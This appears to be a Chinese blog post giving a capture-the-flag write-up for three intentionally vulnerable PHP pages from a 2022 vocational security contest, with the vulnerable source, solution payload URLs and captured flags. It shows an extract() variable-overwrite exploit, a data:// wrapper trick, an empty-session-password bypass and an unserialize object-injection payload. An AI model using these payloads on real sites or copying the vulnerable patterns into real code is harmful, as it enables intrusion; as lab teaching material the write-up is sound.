任务5_开发测试服务器

最新推荐文章于 2024-06-04 11:35:20 发布
最新推荐文章于 2024-06-04 11:35:20 发布
阅读量469 收藏 8
点赞数 6
分类专栏: 2022年浙江省职业院校技能大赛高职组信息安全管理与评估 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/135027331
版权 
1.开发测试服务器首页存在漏洞,请利用漏洞找出 flag,并将 flag提交。flag格式:flag{<flag值>}
2.开发测试服务器第二个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{<flag值>}
3.开发测试服务器第三个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{<flag值>}

1.开发测试服务器首页存在漏洞,请利用漏洞找出 flag,并将 flag提交。flag格式:flag{<flag值>}

<?php
show_source(__FILE__); 
include('config.php'); 
$file = '/file.txt'; 
extract($_GET); 
if(isset($a)){
	$content = trim(file_get_contents($file)); 
	if($a === $content){
		die($flag1);
	}
	else{
			die("wrong");
	}
}
方法一
extract()变量覆盖漏洞:
extract() 函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。返回成功设置的变量数目。
分析:
要求我们GET传参进去值会经过extract()函数下来会有两个if 第一个if判断a这个变量是否存在,存在则继续执行if里面。
使用file_get_contents()读取flag变量里面的文件传递给content变量之后再进行判断传进来a变量的值等不等于$content如果等于则打印出flag!
这里我们构造因为通过extract()函数我们传进的值会变成一个变量例如我们GET传入a=1则会存在$a=1 所以我们构造GET传参
pyaload:http://192.168.42.25/?a=&file=
这样程序中会有两个为空的变量而$file=空则覆盖了上面的$file中的值,进行判断都是空的所以为真则得到flag。
方法二
伪协议:
http://127.0.0.1/index1/?a=1111&file=data://text//plain,1111

Flag:flag{2262d98e-3c79-41ec-aecf-24c19aab741b}

2.开发测试服务器第二个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{<flag值>}

<?php
show_source(__FILE__); 
include('config.php'); 
session_start();
if(isset($_GET['password'])){
	if($_GET['password'] == $_SESSION['password']){ 
		die($flag2);
	}
	else{
		die("wrong"); 
	}
}
mt_srand((microtime() ^ rand(1,10000)) % rand(1,10000) + rand(1,10000));

SESSION验证绕过:
以GET方式传入password,并且与SESSION中的password比较是否相等,相等则返回flag,否则输出提示,虽然在服务端极大概率不能将SESSION中的password正确获取,但是SESSION的password在未登陆时为空,我们只要将GET传入的password设置为空即可绕过。

Flag:flag{4b425f7e-0ea8-463c-bea0-e7a651ecd3f3}

3.开发测试服务器第三个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{<flag值>}

<?php
class CyberSecurity{
		public $cyber;
		public $security;
		public function __wakeup(){
				if(($this->cyber != $this->security) && (md5($this->cyber) === md5 ($this->security)) && (sha1($this->cyber) === sha1($this->security))){
						include('config.php'); 
						die($flag3);
				}
				else{ 
				die("no"); 
				}
		}
}
if(isset($_GET['payload'])){ 
		unserialize($_GET['payload']);
} 
else{
		show_source(__FILE__); 
}

2个变量:cyber和security。题目是要求这两个变量的值不相等(!=是弱比较),但是变量的md5和sha1的值要相等(===是强比较),那么我们可以使之为数组,数组内容不相等,但通过md5与sha算法后的hash却相等,这是⼀个PHP的特性
反序列化做题步骤:
1.复制源代码
2.注释掉和属性不相关的内容
3.给属性复制
4.输出序列化字符串,建议进行url编码
payload:http://192.168.42.25?payload=O:13:"CyberSecurity":2:{s:5:"cyber";a:1:{i:0;s:3:"121";}s:8:"security";a:1:{i:0;s:3:"123";}}
http://127.0.0.1/3/?payload=O%3A13%3A%22CyberSecurity%22%3A2%3A%7Bs%3A5%3A%22cyber%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A111%3B%7Ds%3A8%3A%22security%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A112%3B%7D%7D

Flag:flag{535f1e60-b9af-4fc2-90e7-f9764e4e599f}

Wh1teSu
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python Django 5 Web应用开发实战
weixin_43178406的博客
05-21 1万+
本文主要介绍了Python Django 5 Web应用开发实战,希望能对学习Python Web应用开发的同学们有所帮助。 文章目录 1. 前言 2. 书籍推荐 2.1 内容简介 2.2 本书作者 2.3 本书目录 2.4 适合读者 3. 购买链接
软件测试必问必背面试题
热门推荐
weixin_45912307的博客
10-30 19万+
软件测试必问必背面试题 01 软件测试理论部分 1.1 测试概念 1. 请你分别介绍一下单元测试、集成测试、系统测试、验收测试、回归测试 单元测试:完成最小的软件设计单元(模块)的验证工作,目标是确保模块被正确的编码 集成测试:通过测试发现与模块接口有关的问题 系统测试:是基于系统整体需求说明书的黑盒类测试,应覆盖系统所有联合的部件 回归测试:回归测试是指在发生修改之后重新测试先前的测试用例以保证修改的正确性 验收测试:这时相关的用户或独立测试人员根据测试计划和结果对系统进行测试和接收。验收测试包括Al
测试开发需要学习的知识结构
Just code it!
04-12 8万+
努力成为一个优秀的测试开发从业者,加油!!! 一些视频链接:我这有一些软件测试的视频,你可以点开看看。转行互联网测试需要哪些技能? - 假装在测试的回答 - 知乎作为一名软件测试人员,有哪些网站是你应该多多关注的,哪些书籍是你必须要看的? - 假装在测试的回答 - 知乎白盒与黑盒测试什么区分1、黑盒测试  黑盒测试也称功能测试或数据驱动测试,它是在已知产品所应具有的功能,通过测试来检...
测试开发笔记
qq_43343275的博客
11-14 3万+
测试开发笔记 第一章 测试基础 7 什么是软件测试: 7 ★软件测试的目的、意义:(怎么做好软件测试) 7 3.软件生命周期: 7 第二章 测试过程 8 1.测试模型 8 H模型: 8 V模型 9 2.内部测试 10 3外部测试: 10 验收测试:(在系统测试之后) 11 回归测试: 11 4.测试过程(干什么,怎么干) 12 5.各阶段输入、输出标准以及入口、出口准则:(测试阶段过程要素) 1...
测试开发面试知识点
xfxuezhang.cn
08-28 1万+
测试开发基本面试知识 https://www.cnblogs.com/xiaolovewei/p/9516989.html 微信测试用例 朋友圈:https://www.cnblogs.com/shallwebegin/p/11622004.html https://www.pianshen.com/article/666945413/ 聊天:https://www.cnblogs.com/shallwebegin/p/11621998.html 页面:https://wenku.bai..
服务器怎样帮助简化游戏开发
SonderCloud_的博客
12-17 2724
根据 Newzoo 分析公司的数据,2019年,全球游戏开发市场增长 9.6%,达到1520 亿美元,超过了音乐和电影制作行业的总和。为了在快速增长的市场中保持竞争力并保持领先,游戏工作室需要高质量的开发工具以及可靠且低成本的基础设施解决方案。在本文中,恒创科技将讨论使用云技术解决游戏行业需求的主要场景。 开发测试 传统的 IT 架构不再满足高级游戏公司的需求。在生产和测试阶段,不断需要大量的资源。另一个问题是资源增删的高频率,因为每天在配置环境时需要部署和删除数十个虚拟机。例如,早在 2010 年,
python服务器性能测试工具locust使用指南
qq_38783257的博客
11-20 1万+
文章目录前言安装基本使用User类@task装饰器任务间隔@tag装饰器前置与后置HttpUser类常用参数命令行配置配置文件配置常用压测场景实战高用户高并发场景压测每个用户循环取数据保证并发测试数据唯一性,不循环取数据保证并发测试数据唯一性,循环取数据梯度增压参考 前言 locust是一款由python编写的压测工具,可以很好的和python进行结合使用,功能强大。 locust文档是英文版的,不利于阅读,本文从文档出发,模拟真实的压测需求与场景,带你领略locust的强大。 安装 locust安装方便,
Linux高并发服务器开发—项目实战
梅山
07-11 4010
本文主要介绍开发一个基本的高并发服务器需要用到哪些技术栈和技术实现,内容包括:1、unixI\O操作5中工作模式。2、http协议内容的介绍。3、http协议的工作流程。 4、有限状态机编程思想。5、线程池原理的介绍。6、EPOLL如何确保两个线程同时访问一个socket‘’...
测试开发面试题汇总(自用)
qq_38290604的博客
01-12 2万+
线程和进程区别 进程是操作系统资源分配的基本单位,而线程是处理器任务调度和执行的基本单位。 每个进程都有独立的代码和数据空间,程序之间的切换会有较大的开销;线程可以看做轻量级的进程,同一类线程共享代码和数据空间,线程之间切换的开销小。 进程之间的资源是独立的,线程共享本进程的资源 多线程与多进程 http与https 计算机网络里面每一层的协议 Python的生成器和迭代器区别 python多进程和多线程使用和对比 mysql索引了解吗,用法都是什么,实现原理 简述一下B+树的实现、特点 python的
服务器性能测试方式、方法
invisible_sky的博客
11-29 1万+
本文转载于: http://wetest.qq.com/lab/view/102.html?from=adsout_qqtips_part2_102&sessionUserType=BFT.PARAMS.203291.TASKID&ADUIN=2304228627&ADSESSION=1479866678&ADTAG=CLIENT.QQ.5503_.0&ADPUBNO=26642 本文出自一位腾
dhcp_test_tool:DHCP服务器测试工具
06-16
我在私人时间开发了这个工具,以获取 DHCP 服务器的性能结果并轻松测试其他功能。 所以它的版权属于我自己,而不是公司。用法我解释了一些现在似乎不清楚的配置。通用设置本地IP:它是运行该工具的计算机的本地IP。...
基于Swoole扩展开发游戏服务器框架,示例实现h5游戏开发.rar
04-03
* 该框架主要用于开发游戏服务器,简化游戏前后端开发,框架主要实现了前后端,封包解包,协议解析,压缩,粘包,路由等功能,代码示例为h5游戏。 * 框架比较简单, 几乎不依赖外部源码库, 方便阅读和使用。 * 基本...
Linux系统设计-Linux系统VPS(服务器)性能一键测试脚本
01-10
所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!Linux系统是一个免费使用和自由传播的类Unix操作系统,基于POSIX和UNIX的多用户、多任务、支持多...
测试服务器1
02-22
Laravel试图通过减轻大多数Web项目中使用的常见任务来减轻开发工作的痛苦,例如: 。 。 用于和存储的多个后端。 直观的表达 。 数据库不可知。 。 。 Laravel易于访问,但功能强大,可提供大型,强大的...
面向 Java 开发测试人员的远程执行 Linux/UNIX 系统上任务的框架 -- sshxcute 源码
04-15
面向 Java 开发测试人员的远程执行 Linux/UNIX 系统上任务的框架 -- sshxcute sshxcute 就是这样一个框架工具集,它基于 JSCH 构建,允许工程师利用 Java 代码通过 SSH 连接远程批量执行 Linux/UNIX 系统上的命令...
sh发送邮件如何通过配置SMTP服务器来实现?
qianke369的博客
05-30 762
通过配置SMTP服务器,可以实现在Shell脚本中发送邮件的功能。AokSend,API/SMTP接口秒发邮件,sh脚本一键操作,轻松实现高效营销,让您的业务更上层楼!
在Windows11系统上搭建SFTP服务器
最新发布
zhenxiaojie的博客
06-04 340
如题
服务器数据恢复—异常断电导致ESXi虚拟机无法启动的数据恢复案例
beiya123的博客
05-29 756
服务器数据恢复环境: 某大厂PS4000服务器服务器上部署VMware ESXi虚拟化平台。 服务器故障: 机房断电,重启后服务器中的某台虚拟机不能正常启动。管理员查看虚拟机配置文件,发现无法启动的虚拟机的配置文件除了磁盘文件以外其他配置文件全部丢失,xxx-flat.vmdk磁盘文件和xxx-000001-delta.vmdk快照文件还存在。联系VMware原厂工程师进行诊断,VMware原厂工程师尝试新建一个虚拟机,但发现存储空间不足,于是将故障虚拟机下的xxx-flat.vmdk磁盘文件删除了。
构建 VPC 并启动 Web 服务器
m0_55709044的博客
05-30 1423
这意味着指向互联网 (0.0.0.0/0) 的流量将首先发送到 NAT 网关,NAT 网关随后会将流量转发到互联网。请注意,Destination 0.0.0.0/0(目的地 0.0.0.0/0)设置为 Target igw-xxxxxxxx(目标 igw-xxxxxxxx),即互联网网关。在本任务中,您将使用 VPC 向导在单个可用区中创建一个 VPC、一个互联网网关和两个子网。现在,您将配置私有子网,以将流向互联网的流量路由到 NAT 网关,使得私有子网中的资源能够连接到互联网,同时仍然保持私有。
java web云应用开发实训任务
01-03
4.完成一个实际的云应用开发项目,包括需求分析、设计、开发测试和部署。 三、任务内容 1.学习云计算基础知识,包括云计算的基本概念、分类、部署模式等; 2.掌握Java web开发技术,包括Spring框架、Hibernate...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值